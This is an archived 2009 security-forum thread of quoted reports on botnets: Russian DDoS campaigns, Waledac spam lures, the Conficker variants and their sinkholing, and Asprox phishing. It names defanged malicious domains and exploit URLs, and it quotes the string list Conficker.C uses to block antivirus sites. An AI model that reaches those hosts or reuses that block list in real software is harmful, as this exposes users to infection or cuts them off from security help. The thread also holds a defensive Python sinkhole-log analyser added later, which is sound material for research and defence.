View Full Version : Pandemic of the botnets 2009

2009-01-07, 18:28
FYI... Please do NOT visit the sites mentioned in the article!

Russia: Opposition Websites and DDoS
- http://asert.arbornetworks.com/2009/01/russia-opposition-websites-and-ddos/
January 6, 2009 - "We’re again seeing reports about political DDoS targets within Russia. This time we saw it mentioned in the blog post Russian Opposition Websites Shut Down By Attacks* from the blog The Other Russia. And again we have data to support the claims. The site www .grani .ru has come under attack from two Black Energy botnets. One of them is well known to many of us, “candy-country .com”, and the other is relatively new on the scene, 22×2x2×22 .com. Both are hard at work with HTTP floods against the site.
Kasparov .ru is back in the news and again being targeted by Black Energy botnets. 22×2x2×22 .com is striking the site, as well as the well known BE botnet ad .yandexshit .com.... the website of MSK radio, echo .msk .ru, is also under attack by these two botnets. Voices of dissent again being quieted by force.
At least some of these bots participated in the recent DDoS attacks between Russia and Georgia, but they’ve also struck non-political targets quite a bit in the past year or so. Escort sites, gambling sites, etc. Politics is a rough sport in Russia, and the use of DDoS to silence the opposition’s website shows the power of the web in getting a voice out, its value in being silenced, and possibly what’s to come in the future."
* http://preview.tinyurl.com/8nff8b


2009-01-10, 12:09

2008 H2 Fast Flux Data Analysis
- http://asert.arbornetworks.com/2009/01/2008-h2-fast-flux-data-analysis/
January 8, 2009 - "... Comparison and Trends
We’re seeing two trends of note with respect to 2008 with fast flux domain registrations and use. The first is the growth of .CN as a fast flux TLD. Most of the .CN domains we see registered and fluxing come through a registrar like BIZCN, whom we now treat with some suspicion. This could be due to them being negligent or completely subverted, but either way we’re not surprised to see a BizCN registration of a fluxy .CN domain name. We also think that this rapid growth in .CN as a fluxing TLD may be due to a fire sale of .CN domain registrations that occurred late in 2008.
The second big trend over 2008 is the migration away from .COM and .CN to a lot more TLDs. As we noted in our paper earlier this year, by the middle of 2008 more TLDs were being used than had been seen in Thorsten’s previous paper. By the end of 2008 even more TLDs were in use. The long tail is getting longer, meaning more registrars have to be educated and empowered to respond to abuse notices with takedowns.
2008 was a very big year for fast flux service hosting, and we’ll continue to see it in 2009. We’re working with more people to analyze such botnets and track their activities, and we’ll be reporting it here."
(Info charts available at the URL above.)


2009-01-15, 00:05

- http://voices.washingtonpost.com/securityfix/2009/01/meet_the_new_bots_will_we_get.html
January 13, 2009 - "The close of 2008 sounded the death knell for some of the most notorious spam networks on the planet. But already several new breeds of spam botnets - massive groups of hacked PCs used for spamming - have risen from the ashes, employing a mix of old and new tricks to all but ensure a steady flow of spam into e-mail boxes everywhere for many months to come... In its January Spam Report* (PDF), McAfee reports that while current spam levels have shown a significant increase in the last few weeks, they are still 40 percent lower than levels prior to the demise of McColo. Symantec, in its State of Spam report** (PDF) for January, says spam levels are now at 80 percent of their pre-McColo-shutdown levels."

* http://www.mcafee.com/us/local_content/reports/mfe_spam_report_jan09.pdf

** http://eval.symantec.com/mktginfo/enterprise/other_resources/b-state_of_spam_report_01-2009.en-us.pdf

- http://www.theregister.co.uk/2009/01/14/botnets_of_2009/
14 January 2009

Spam Botnets to watch in 2009
- http://www.secureworks.com/research/threats/botnets2009/?threat=botnets2009
January 13, 2009

- http://www.marshal.com/trace/traceitem.asp?article=843
January 12, 2009


2009-01-22, 13:30

Inauguration Themed Waledac - New Tactics & New Domains
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090119
January 19, 2009 - "...the Inauguration of Barack Obama and the Waledac trojan has been in full swing attempting to take advantage of the event. Since late last week the trojan has been blasting its way across the Internet with e-mails attempting to bring unwitting users to a page that looks a lot like the official Barack Obama website. The page is updated each day to appear to have a new blog entry... As always do NOT visit these domains as they are malicious and hosting exploit code... Click here* for a full listing of Waledac domains that we are aware of - this link will be updated as we get them. Your best bet is to block these domains or otherwise avoid them..."
* http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt
Updated 01-21-2009


2009-01-25, 18:56

Full Waledac Domain Listing
- http://www.securityzone.org/?p=61
January 24, 2009 - "'Got the full list also being updated and posted on the Shadowserver website at the following URL:
Updated 01-25-2009 - 19:10 UTC

...Also, if you are interested in all things Waledac...
http://sudosecure.net/waledac/ "
Waledac Tracker Summary Data

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090124
January 24, 2009 - "...Add those to your block lists and do NOT visit them."


2009-01-29, 14:24

Kyrgyzstan Under DDoS Attack From Russia
- http://preview.tinyurl.com/dfdf84
January 28, 2009 Secureworks blog - "Since January 18, 2009, the two primary Kyrgyzstan ISPs (www .domain .kg, www .ns .kg) have been under a massive, sustained DDoS attack almost identical in some respects to those that targeted Georgia in August 2008. Few alternatives for Internet access exist in Kyrgyzstan. With just two smaller ISPs left to handle the load, these attacks from Russian IP address space have essentially knocked most of the small, Central Asian republic offline. Some believe that this is a way to silence rhetoric from a new and relatively powerful opposition coalition whose primary aim is the removal of current government officials, especially Kyrgyz President Kurmanbek Bakiyev, and a break from the administration's policies. On the other hand, others think these attacks are part of a Russian campaign to pressure Kyrgyz President Kurmanbek Bakiyev to close US access to a key airbase, which intensified on the same day as the DDoS attacks. That airbase is a key resource in the war against Islamist militants in Afghanistan... The use of cyber militias puts distance between the Russian government and shelters it from culpability for the peacetime use of information warfare tactics. There is often a combination of motives... With modern worms capable of quickly building 1+ million strong botnet armies, will we have countermeasures and contingency plans in place when the crosshairs lock on to our own infrastructure?"

Russian 'cybermilitia' knocks Kyrgyzstan offline
- http://preview.tinyurl.com/akct9k
January 28, 2009 (Computerworld)

- http://atlas.arbor.net/
"...We are investigating ongoing DDoS issues in Kyrgyzstan..."
- http://atlas.arbor.net/summary/dos


2009-01-31, 01:16

Asprox goes phishing again
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090129
29 January 2009 - "The first time around with Asprox, we saw a little bit of phishing. The question with any botnet is "how do they make money off of this?" Phishing is certainly one way. Renting your botnet out to a phishing organization is probably an even better way. Much less risk for you, Mr. Botnet Herder. Today we saw a template update to the drones... Once you fill in some details, your form is submitted to <asprox node>... then your browser is redirected to the homepage of the real bank site. With Asprox's template capabilities, I imagine we'll see more of this."

(Screenshot and more detail available at the URL above.)


2009-01-31, 15:08

Trojan: W32/Waledac
- http://atlas.arbor.net/briefs/index#-47237018
Severity: High Severity
Published: Friday, January 30, 2009 14:30
We have been tracking a new variant of the storm worm for the past month, approximately. This new version, dubbed Waledac, is a new rewrite of the Storm worm's engine but uses the same back end. Nodes are infected through malicious websites and join a P2P managed botnet using HTTP. Once infected, nodes send spam messages related to new infection lures and to pharmacy spam. The botnet also creates a fast flux service network.
Analysis: This is a high severity threat and we have been working with various teams to help dissect the botnet. We do not anticipate that it will be resolved soon.
Source: Trojan:W32/Waledac.gen - http://www.f-secure.com/v-descs/trojan_w32_waledac_gen.shtml
Source: Trojan:W32/Waledac.A - http://www.f-secure.com/v-descs/trojan_w32_waledac_a.shtml


2009-02-03, 13:20

UkrTeleGroup shutdown...
- http://news.softpedia.com/news/ISP-Hosting-Rogue-DNS-Servers-Shut-Down-103400.shtml
31 January 2009 - "UkrTeleGroup, a notorious ISP based in Ukraine, has been depeered by its uplink provider. In addition to the vast malicious activity originating from its address space, the ISP was also hosting the rogue DNS servers used by the Zlob (DNSChanger) family of trojans. Brian Krebs, journalist at The Washington Post, who also maintains the Security Fix blog, reports* that UkrTeleGroup Ltd. has been known to be involved in online criminal activity since as far back as 2005. As a result, security experts, from the likes of McAfee or the Internet Storm Center**, have recommended blocking all traffic from the IP block owned by the Ukrainian company. The Miami-based FPL FiberNet, which is part of the FPL Group, took the decision to terminate the contract with one of its customers, who was providing uplink to UkrTeleGroup, after receiving a complaint from its own service provider, including an inquiry from Mr. Krebs... The DNSChanger computer trojan comes in many variants, but all of them exhibit the same core concept of forcing the infected computers to use rogue DNS servers. This type of server is used by computers to resolve domain names to IPs, and the gang behind the trojan has proved particularly innovative in finding new ways to hijack them. While the original DNSChanger version was doing nothing more than modifying the Windows HOSTS file in order to override legit DNS responses, its latest mutations are capable of breaking into LAN routers and modifying their settings or hijacking DNS requests from wireless clients and poisoning the replies... Some researchers are pointing out that the DNSChanger gang started migrating its servers away from UkrTeleGroup to other more difficult to reach ISPs in Eastern European countries, such as Latvia, a month ago. But even so, the takedown of UkrTeleGroup is bound to hinder the operations of other cyber criminal groups, who used its services to host phishing websites or malware distribution servers.
This latest win for the security community comes after other similar efforts led to the shut down, in 2008, of Atrivo/Intercage, a hosting provider affiliated with the notorious Russian Business Network, or the depeering of the infamous McColo ISP, which served as home for the command and control servers of many of the world's largest spam-sending botnets. ICANN terminating the accreditation of the EstDomains, the favorite domain registrant of cyber criminals, represented an important victory as well."

* http://voices.washingtonpost.com/securityfix/2009/01/troubled_ukrainian_host_sideli.html

** http://isc.sans.org/diary.html?storyid=5434


2009-02-10, 12:51

Botnet controllers for sale
- http://sunbeltblog.blogspot.com/2009/02/botnet-controllers-for-sale.html
February 09, 2009 - "... Now, we see a development shop boasting about its work on malware. Sniffing around an iframedollars trojan, we saw a GET request to promake.me. This resulted in an additional trojan being downloaded..."

(Screenshots available at the URL above.)


2009-02-12, 14:03

Multiple botnets spread Valentine's Day SPAM/malware
- http://preview.tinyurl.com/azlcnw
2009-02-11 - E-week.com "...Researchers at Marshal8e6* have seen three distinct campaigns from three different botnets, as well as spam attacks from botnets they have not yet identified. Most of the Valentine's Day-related spam is coming from Waledac, which appeared on the scene late in 2008. Security pros now believe the botnet is the work of the minds behind the infamous Storm botnet that made headlines in 2007. After being targeted by Microsoft's Malicious Software Removal Tool, Storm limped through most of 2008 before disappearing completely in September... In its place came Waledac, which emerged in December with a blended threat Christmas e-card campaign. Like Storm, Waledac uses a peer-to-peer connection model with fast-flux DNS (Domain Name System) hosting and encrypted communications. Today, researchers speculate that Waledac may comprise as many as 20,000 bots... In addition to Waledac, the Pushdo botnet and others have joined in with their own Valentine's Day campaigns..."
* http://marshal.com/trace/traceitem.asp?article=870
Last Reviewed: February 11, 2009 - "...Please be wary this Valentine’s day and err on the side of caution. Avoid opening Valentine’s day e-card messages unless you can clearly identify and trust the sender."


2009-02-12, 19:33

Joint Effort at Conficker Disruption
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090212
12 February 2009 - "Today Microsoft announced a cooperative effort that has been underway to actively disrupt and contain the Conficker worm outbreak. The Shadowserver Foundation is honored and pleased to be part of this effort which is truly the first of its type. This project brings together those organizations that can effect change at the domain level where the botnet traditionally anchors itself... If these domains can be identified, and have their DNS pointed to a friendly server instead of the C&C, you accomplish several good things. First, you've essentially crippled the botnet, and second you're now able to identify all the infected drones trying to connect to the C&C since they are now attempting connections to that friendly server. Shadowserver has employed various processes to identify the domain names, act as that friendly server, and enumerate the orphaned drones. We add this data to our freely distributed report process which notifies the appropriate network operators that there are infected machines on their network. In the case of Conficker/Downadup, we've actually been watching this for some time, and playing the role of a 'friendly' server for over a month... We at Shadowserver are very hopeful that this effort is foundational, one that will gain traction and attention from those organizations that can make a difference. The issue now is truly global. The botnet scourge is monumental. It requires worldwide coordination and cooperation among industry, government, and law enforcement. Working in silos and in isolation won't work any longer. As a non-profit, vendor-neutral organization, Shadowserver is committed to this effort and in working with other groups dedicated to improving the safety of the Internet..."

- http://www.microsoft.com/Presspass/press/2009/feb09/02-12ConfickerPR.mspx
Feb. 12, 2009

- http://preview.tinyurl.com/aaoefb
02-12-2009 Symantec Security Intel Analysis Team

- http://preview.tinyurl.com/ah9neb
February 12, 2009 (Computerworld)

Third party information on conficker
- http://isc.sans.org/diary.html?storyid=5860
Last Updated: 2009-02-13 06:45:53 UTC - "(This will be updated as more information becomes public)... Removal Instructions, Removal Tools..." etc.

- http://atlas.arbor.net/briefs/index#847040090
February 13, 2009 - "Microsoft has announced that it has been working with various industry partners, Arbor Networks included, to thwart the use of the domain names generated by the Conficker worm to block the attacker from making updates to the worm. Sinkholes are being coordinated to identify infected hosts and to share the data with the necessary parties, as well.
Analysis: This is an unprecedented move and should help keep the worm from growing into a larger problem. The worm continues to spread and the population has grown to as many as 12 million or more..."
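As an added illustration of the sinkhole enumeration the Shadowserver post above describes (example code written for this thread, not Shadowserver's own tooling): once the day's rendezvous domains point at a "friendly" server, every web request that arrives for one of those domains identifies an infected drone, and grouping the source addresses by operator prefix yields the per-network notification the post mentions. The log format, the DGA domain list, the addresses and the prefix-to-operator map are all constructed assumptions.

```python
import re
import ipaddress
from collections import defaultdict

# Constructed sample log from a hypothetical sinkhole web server. The format is
# assumed: Apache combined log with the requested Host header appended as the
# final quoted field. Addresses and domains are documentation/example values.
SINKHOLE_LOG = """\
198.51.100.23 - - [13/Feb/2009:06:01:12 +0000] "GET /search?q=1 HTTP/1.1" 200 13 "-" "-" "qwvjxkd.biz"
198.51.100.23 - - [13/Feb/2009:06:01:13 +0000] "GET /search?q=1 HTTP/1.1" 200 13 "-" "-" "qwvjxkd.biz"
203.0.113.7 - - [13/Feb/2009:06:02:40 +0000] "GET /search?q=1 HTTP/1.1" 200 13 "-" "-" "pzlxyer.info"
203.0.113.88 - - [13/Feb/2009:06:03:01 +0000] "GET /search?q=1 HTTP/1.1" 200 13 "-" "-" "hkwuqle.net"
192.0.2.200 - - [13/Feb/2009:06:03:05 +0000] "GET /index.html HTTP/1.1" 200 13 "-" "-" "sinkhole.example"
this line is garbage and must be skipped
198.51.100.77 - - [13/Feb/2009:06:04:30 +0000] "GET /search?q=1 HTTP/1.1" 200 13 "-" "-" "QWVJXKD.BIZ"
"""

# Rendezvous domains that were registered and pointed at the sinkhole for the
# day. The real list comes from running the worm's domain generation algorithm;
# this is a constructed stand-in.
DGA_DOMAINS = {"qwvjxkd.biz", "pzlxyer.info", "hkwuqle.net"}

# Constructed mapping of address space to the operator responsible for it, i.e.
# who receives the notification. In practice this comes from routing/whois data.
OPERATOR_PREFIXES = [
    (ipaddress.ip_network("198.51.100.0/24"), "Operator-A"),
    (ipaddress.ip_network("203.0.113.0/24"), "Operator-B"),
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<host>[^"]*)"$'
)


def parse_line(line):
    """Return the fields of one log line, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    # Normalise the Host header: case-insensitive, trailing dot ignored.
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "host": m.group("host").lower().rstrip(".")}


def enumerate_drones(log_text, dga_domains):
    """Map each source address that asked for a DGA domain to what it did.

    Only requests whose Host header is one of the sinkholed DGA domains count;
    requests for anything else (the sinkhole's own name, scanners, typos) are
    not evidence of infection. Assumes the log is in chronological order.
    """
    drones = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["host"] not in dga_domains:
            continue
        entry = drones.setdefault(rec["ip"], {
            "hits": 0, "domains": set(),
            "first_seen": rec["ts"], "last_seen": rec["ts"]})
        entry["hits"] += 1
        entry["domains"].add(rec["host"])
        entry["last_seen"] = rec["ts"]
    return drones


def operator_for(ip_text, prefixes):
    """Find which operator's prefix contains the address ('unknown' if none)."""
    addr = ipaddress.ip_address(ip_text)
    for net, name in prefixes:
        if addr in net:
            return name
    return "unknown"


def report_by_operator(drones, prefixes):
    """Group infected addresses by operator, as a notification report would."""
    report = defaultdict(list)
    for ip_text in drones:
        report[operator_for(ip_text, prefixes)].append(ip_text)
    return {name: sorted(ips, key=ipaddress.ip_address)
            for name, ips in report.items()}


if __name__ == "__main__":
    found = enumerate_drones(SINKHOLE_LOG, DGA_DOMAINS)
    for operator, ips in report_by_operator(found, OPERATOR_PREFIXES).items():
        print(operator, ips)
```

A single source address behind NAT can hide many infected hosts, so the hit count per address is a lower bound on the number of drones there.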


2009-02-20, 11:52

- http://mtc.sri.com/Conficker/#fig-libemu
Last Update: 21 February 2009 - "...the Conficker authors have released a variant of Conficker B, which significantly upgrades their ability to flash Conficker drones with Win32 binaries from any address on the Internet. Here, we refer to this variant as Conficker B++... On Feb 16, 2009, we received a new variant of Conficker. At a quick glance, this variant resembles Conficker B. In particular, it is distributed as a Windows DLL file and is packed similarly. Furthermore, dynamic analysis revealed that this domain generation algorithm was identical to that of Conficker B. Hence, we initially dismissed this as another packaging of Conficker B. However, deeper static analysis revealed some interesting differences. Overall, when we performed a comparative binary logic analysis (see Appendix 2 - Horizontal Malware Analysis) comparing Conficker B with Conficker B++, we obtained a similarity score of 86.4%. In particular, we found that out of 297 subroutines in Conficker B, only 3 were modified in Conficker B++ and around 39 new subroutines were added..."

Appendix I: Conficker Census
- http://mtc.sri.com/Conficker/#appendix-1

Appendix 2 - Horizontal Malware Analysis
- http://mtc.sri.com/Conficker/HMA/index.html

- http://blogs.technet.com/mmpc/archive/2009/02/20/updated-conficker-functionality.aspx
February 20, 2009 - "... Future versions of the MSRT will detect this sample as Worm:Win32/Conficker.C* while the MSRT which was released earlier this month detects it as Worm:Win32/Conficker.B. The new sample has modifications which introduce new backdoor functionality. Previous versions of Conficker patched netapi32.dll in memory to prevent further exploitation of the vulnerability addressed by bulletin MS08-067. We’ve discovered that the new variant no longer patches netapi32.dll against all attempts to exploit it. Instead it now checks for a specific pattern in the incoming shellcode and for a URL to an updated payload. The payload only executes if it is successfully validated by the malware. However, there doesn’t appear to be an easy way for the authors to upgrade the existing Conficker network to the new variant. This change may allow the author to distribute malware to machines infected with this new variant. This might be a response to the fact that they no longer have the ability to register many of the Conficker domains... note that this is a polymorphic threat..."
* http://www.microsoft.com/security/portal/Entry.aspx?Name=Worm%3aWin32%2fConficker.C


2009-03-03, 20:29

Waledac coupon campaign & updated Domain List
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090302
March 02, 2009 - ".... The domains are kept updated at the following URL:
• http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt
Waledac Domain List - Updated 03-01-2009...
We have also introduced a new URL which is all of the Waledac domains in alphabetical order with no comments or anything else. It currently has 143 domains on it and can be reached via the following URL:
• http://www.shadowserver.org/wiki/uploads/Calendar/waledac_list.txt
These should both be updated at the same time from now on as we add new ones to the list. Please use the domains as you see fit for detecting malicious activity and proactive blocking...
New Theme & Exploits
In the last week or so too, you may have noticed that Waledac recently moved to a new theme about the Economic Crisis and having downloadable coupons. This is just the latest social engineering lure to attempt to get users to install the trojan on their system. Additionally, for some time now, Waledac has been linking to exploit code that it hosts itself. Lately the domain involved seems to frequently be "chatloveonline .com" with an iframe pointing to it and the URL "/tds/Sah7". So be on the lookout and don't visit Waledac domains to avoid the exploits."


2009-03-07, 11:14

Conficker variant - new domain algorithm generates 50,000-a-day...
- http://preview.tinyurl.com/aegncn
03-06-2009 (Symantec Security Response Blog) - "Symantec’s ongoing monitoring of Downadup (a.k.a. Conficker) has today resulted in the observation of a completely new variant being pushed out to systems that are already infected with Downadup. After taking into account the hype surrounding some other recent reports of variants* of Downadup, Symantec is calling this new variant W32.Downadup.C. Our analysis of the sample in question is still ongoing and at an early stage, but our initial findings have already revealed some interesting new attributes for this sample. It does not seem to be using any existing or new means to spread the threat to new machines. It is targeting antivirus software and security analysis tools with the aim of disabling them... Downadup authors have now moved from a 250-a-day domain-generation algorithm to a new 50,000-a-day domain generation algorithm. The new domain generation algorithm also uses one of a possible 116 domain suffixes... The most effective step that organizations and end users can take is to ensure that their computers have up-to-date antivirus software and patches."

* https://forums2.symantec.com/t5/Malicious-Code/A-New-Downadup-Variant/ba-p/391186
02-23-2009 - "... new variant of Downadup (a.k.a. Conficker), which has been dubbed Downadup.B++ or Conficker.C... one could categorize Downadup into three variants..."

- http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-030614-5852-99&tabid=2
Updated: March 6, 2009 10:38:28 PM
Updated: March 7, 2009 5:30:25 PM
Updated: March 8, 2009 9:23:42 AM
Updated: March 11, 2009 4:12:59 PM
Type: Trojan, Worm
Infection Length: 88,576 bytes
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Vista, Windows XP


2009-03-12, 16:27

- http://blog.trendmicro.com/new-downad-generates-more-urls/
Mar. 11, 2009 - "... yet another variant of the infamous DOWNAD family... DOWNAD (also known as Conficker) is one of the more destructive outbreak worms in the Web threat era, with numbers matching that of giant botnets Storm and Kraken... The two earlier DOWNAD worms, as of this month, have already infected a million PCs based on Trend Micro’s World Virus Tracking Center... Security researchers estimate the global infection at around nine million PCs... added features include the increased number of generated domains, from the 250 generated by the earlier variants to 50,000. While the worm only attempts to connect to around 500 randomly selected domains at a time, this modification is seen as an effort to add survivability to the DOWNAD botnet... blocking these domains is almost impossible not only because of the daily volume, but also because there is a high possibility of legitimate domain collisions where DOWNAD generates domains already in use by legitimate entities. Like the other DOWNAD worms, this new variant also blocks access to antivirus-related sites, as well as terminates security tools..."

- http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-030614-5852-99&tabid=2
Updated: March 11, 2009 - "... If the date and time is on or after 1st April 2009, it uses the date information to generate a list of domain names..."


2009-03-20, 12:53

Conficker C analysis
- http://mtc.sri.com/Conficker/addendumC/
Last Update: 19 March 2009 - "...One major implication from the Conficker B and C variants, as well as other now recently emerging malware families, is the sophistication with which they are able to terminate, disable, reconfigure, or blackhole native operating system (OS) and third-party security services. We provide an in-depth analysis of Conficker's Security Product Disablement logic* ... Those responsible for this outbreak have demonstrated Internet-wide programming skills, advanced cryptographic skills, custom dual-layer code packing and code obfuscation skills, and in-depth knowledge of Windows internals and security products. They are among the first to introduce the Internet rendezvous point scheme, and have now integrated a sophisticated P2P protocol that does not require an embedded peer list. They have continually seeded the Internet with new MD5 variants, and have adapted their code base to address the latest attempts to thwart Conficker. They have infiltrated government sites, military networks, home PCs, critical infrastructure, small networks, and universities, around the world... C then installs several in-memory patches to DLLs, and embeds other mechanisms to thwart security applications that would otherwise detect its presence. C modifies the host domain name service (DNS) APIs to block various security-related network connections (Domain Lookup Prevention), and installs a pseudo-patch to repair the 445/TCP vulnerability, while maintaining a backdoor for reinfection (Local Host Patch Logic). This pseudo patch protects the host from buffer overflows by sources other than those performed by the Conficker authors or their infected peers. Like Conficker B, C incorporates logic to defend itself from security products that would otherwise attempt to detect and remove it. C spawns a security product disablement thread. 
This thread disables critical host security services, such as Windows defender, as well as Windows services that deliver security patches and software updates. These changes effectively prevent the victim host from receiving automated software updates. The thread disables security update notifications and deactivates safeboot mode as a future reboot option. This first thread then spawns a new security process termination thread, which continually monitors for and kills processes whose names match a blacklisted set of 23 security products, hot fixes, and security diagnosis tools..."
* http://mtc.sri.com/Conficker/addendumC/#SecurityProductDisablement


2009-03-22, 19:31

Third party information on Conficker
- http://isc.sans.org/diary.html?storyid=5860
Last Updated: 2009-03-30 18:34:41 UTC ...(Version: 4)
(See "Removal Tools")


2009-03-28, 14:04
FYI... a few updates on Conficker. Currently, some AV's are "Scanning for 1,328,914 virus strains and unwanted programs...". Conficker is just a few of them.

- http://www.secureworks.com/research/blog/index.php/2009/3/27/conficker-april-fools-hype/
March 27, 2009 - "... If you’re reading this, you’re probably not infected with Conficker.C. If you were already infected, you wouldn’t be able to access any page on secureworks.com, due to the worm author’s apparent dislike for the removal instructions we posted for earlier Conficker variants..."

- http://blogs.technet.com/msrc/archive/2009/03/27/update-on-conficker-d.aspx
March 27, 2009

- http://www.f-secure.com/weblog/archives/00001636.html
March 26, 2009


2009-03-30, 21:31

- http://windowssecrets.com/comp/090330#story1
2009-03-30 - "... Conficker.C interferes with access to sites containing the following strings (as well as scores of other strings not shown here) in any portion of the URL:
antivir ca. cert. conficker f-secure kaspersky mcafee
microsoft msdn. msft. norton panda safety.live sans.
symantec technet trendmicro windowsupdate
... the only people who can access the Conficker removal tools these writers recommend are people whose PCs are -not- infected with Conficker.C... BitDefender has set up a new domain from which users can download free Conficker disinfectant utilities..."
- http://www.bdtools.net/how-to-remove-downadup.php


2009-04-01, 19:02

Third party information on conficker
- http://www.dshield.org/diary.html?storyid=5860
Last Updated: 2009-04-11 18:15:39 UTC ...(Version: 9) <<<
(See "Removal Tools")

Conficker Eye Chart
- http://www.confickerworkinggroup.org/infection_test/cfeyechart.html
04.01.2009 - (See: "Explanation" at bottom of page there)


2009-04-09, 21:30

- http://preview.tinyurl.com/dl3pz9
04-08-2009 Symantec Security Response Blog - "We have come across a system infected with W32.Downadup.C that has provided some interesting information. We discovered some similarly named files, 484528750.exe and 484471375.exe, which had shown up in the \Windows\temp folder within one minute of each other. These files turned out to be W32.Waledac and a modified W32.Downadup variant, respectively..."

- http://www.viruslist.com/en/weblog?weblogid=208187654
April 09, 2009 Kaspersky blog - "The computers infected with Trojan-Downloader.Win32.Kido (aka Conficker.c) contacted each other over P2P, telling infected machines to download new malicious files... once again it’s a worm, and it’s only functional until 3rd May... One of the files is a rogue antivirus app... The first version of Kido, detected back in November 2008, also downloaded fake antivirus to the infected machine. And once again, six months later, we’ve got unknown cybercriminals using the same trick. The rogue software, SpywareProtect2009, can be found on spy-protect-2009 .com, spywrprotect-2009 .com, spywareprotector-2009 .com... Once it’s run, you see the app interface, which naturally asks if you want to remove the threats it’s “detected”. Of course, this service comes at a price - $49.95... At the moment, the rogue antivirus comes from sites located in Ukraine (131-3.elaninet .com), although Kido is downloading it from other sites. The latest version of Kido also downloads Email-Worm.Win32.Iksmas.atz to infected systems. This email worm is also known as Waledac, and is able to steal data and send spam... Both Kido and Iksmas are now present on infected machines and part of the gigantic botnet designed to conduct spam mailings..."
(Screenshots available at the viruslist/Kaspersky URL above.)

- http://www.f-secure.com/weblog/archives/00001652.html
April 9, 2009

- http://asert.arbornetworks.com/2009/04/conficker-did-not-melt-the-internet/
April 9, 2009


2009-04-16, 14:19

New Waledac variant in the wild
- http://securitylabs.websense.com/content/Alerts/3343.aspx
04.16.2009 - " Websense... has detected a new Waledac variant in the wild being distributed via email since yesterday. The new campaign uses a theme whereby the user is enticed to download an application that will permit them to view other people's SMS messages online. The download file uses alternating filenames, including sms.exe, freetrial.exe, and smstrap.exe. ThreatSeeker has identified thousands of spam emails using this theme. Not all major antivirus vendors are currently detecting this threat..."

Waledac - New Campaign, New Domains, GeoCities, and SpywareProtect2009
- http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090416
16 April 2009

- http://blog.trendmicro.com/new-waledac-campaign-sms-snooping-software/
Apr. 16, 2009

- http://www.f-secure.com/weblog/archives/00001658.html
April 16, 2009

(Screenshots available at all URLs above.)

Fake SMS Reader Spam in Russian Language: Malicious Web Site / Malicious Code
- http://securitylabs.websense.com/content/Alerts/3344.aspx

- http://blog.trendmicro.com/online-casino-geocities-and-waledac/
Apr. 15, 2009 - "... Waledac updated its spam emails and is now spamming online casino advertisements..."
(Screenshots available at the TrendMicro URL above.)


2009-04-22, 13:48

WALEDAC’s latest Spamming fetish
- http://blog.trendmicro.com/waledac%E2%80%99s-latest-spamming-fetish/
Apr. 21, 2009 - "WALEDAC has found a new fetish — spamming users with email messages on free foot fetish movies... clicking the link in the spammed email redirects users to websites featuring foot fetish videos. WALEDAC is notorious for employing various social engineering techniques that lead users to a series of malware infections. This being the third of the recent WALEDAC spam runs we’ve seen, it’s quite safe to assume we’ll be seeing more of these runs in the near future."
(Screenshots available at the URL above.)

- http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090421
21 April 2009


2009-04-22, 13:51

New botnet found - 1.9M bots
- http://www.finjan.com/MCRCblog.aspx?EntryId=2237
Apr 22, 2009 - "... recent discovery of a network of 1.9 million infected computers controlled by cybercriminals... We found that the botnet’s command and control server is hosted in Ukraine. As folders on this server were left open, we were able to get more information for our research. The server has a nice backend management application making it easy for the attackers to manage the infected machines. One of the management console features that we identified is a Command Editing panel through which instructions are sent to the infected machines (bots). We have seen commands asking the bots to download and execute additional malware, download settings files, apply update files etc... This command instructs the bot on the infected computers to download and execute a Trojan horse... only 4 out of 39 Anti-Virus products detected this Trojan... The description field of this command led us to a hacker’s forum in Russia with a post requesting to trade in infected computers... (Another) command instructs the infected machines to download and execute a Trojan horse that later installs a group of other malicious executables without the user’s consent... Overall, the cybergang can remotely execute anything it likes on the infected computers. The log file on the server disclosed the IP addresses of the infected computers and their names in the network..."

(Screenshots available at the URL above.)


2009-04-22, 18:43

Gov systems found on 1.9m zombie botnet
- http://www.theregister.co.uk/2009/04/22/superbotnet_server/
22 April 2009 - "... cybercrooks collectively compromised computers in 77 government-owned domains (.gov) from the UK, US and various other countries. The malware that featured in the attack allowed hackers complete control of compromised PCs, nearly all of which were running Windows XP. A variety of malicious actions, from reading emails to copying files, keystroke logging, and spam distribution were all possible. Since discovering the botnet, Finjan has supplied information about the server to UK and US law enforcement agencies. The command server is now out of commission. Finjan has informed affected corporate and government agencies about infected computer names, in a move that will hopefully result in a clean-up operation..."


2009-04-23, 14:35

Tracking Spam Botnets...
- http://www.marshal8e6.com/trace/bot_statistics.asp
April 12, 2009 - "...spamming botnets are constantly in flux. Botnets morph, become obsolete, replaced, taken down, and upgraded. One thing is clear, a mere handful of botnets are responsible for the bulk of all spam sent. This page pulls together some of the results of our latest research, highlighting details about some of the most notorious spamming botnets..."
(Graphs and more detail available at the Marshal URL above.)

- http://www.theregister.co.uk/2009/04/23/botnet_speed_test/
23 April 2009 - "... Xarvester and Rustock threw off the most junk mail, 25K messages an hour or the equivalent of 600K spams a day. The data on spam rates was harvested from a wider research project into botnets run by Marshal8e6 over the last two years..."


2009-05-04, 18:56

Botnet probe turns up 70GB of personal, financial data
- http://preview.tinyurl.com/cmzd68
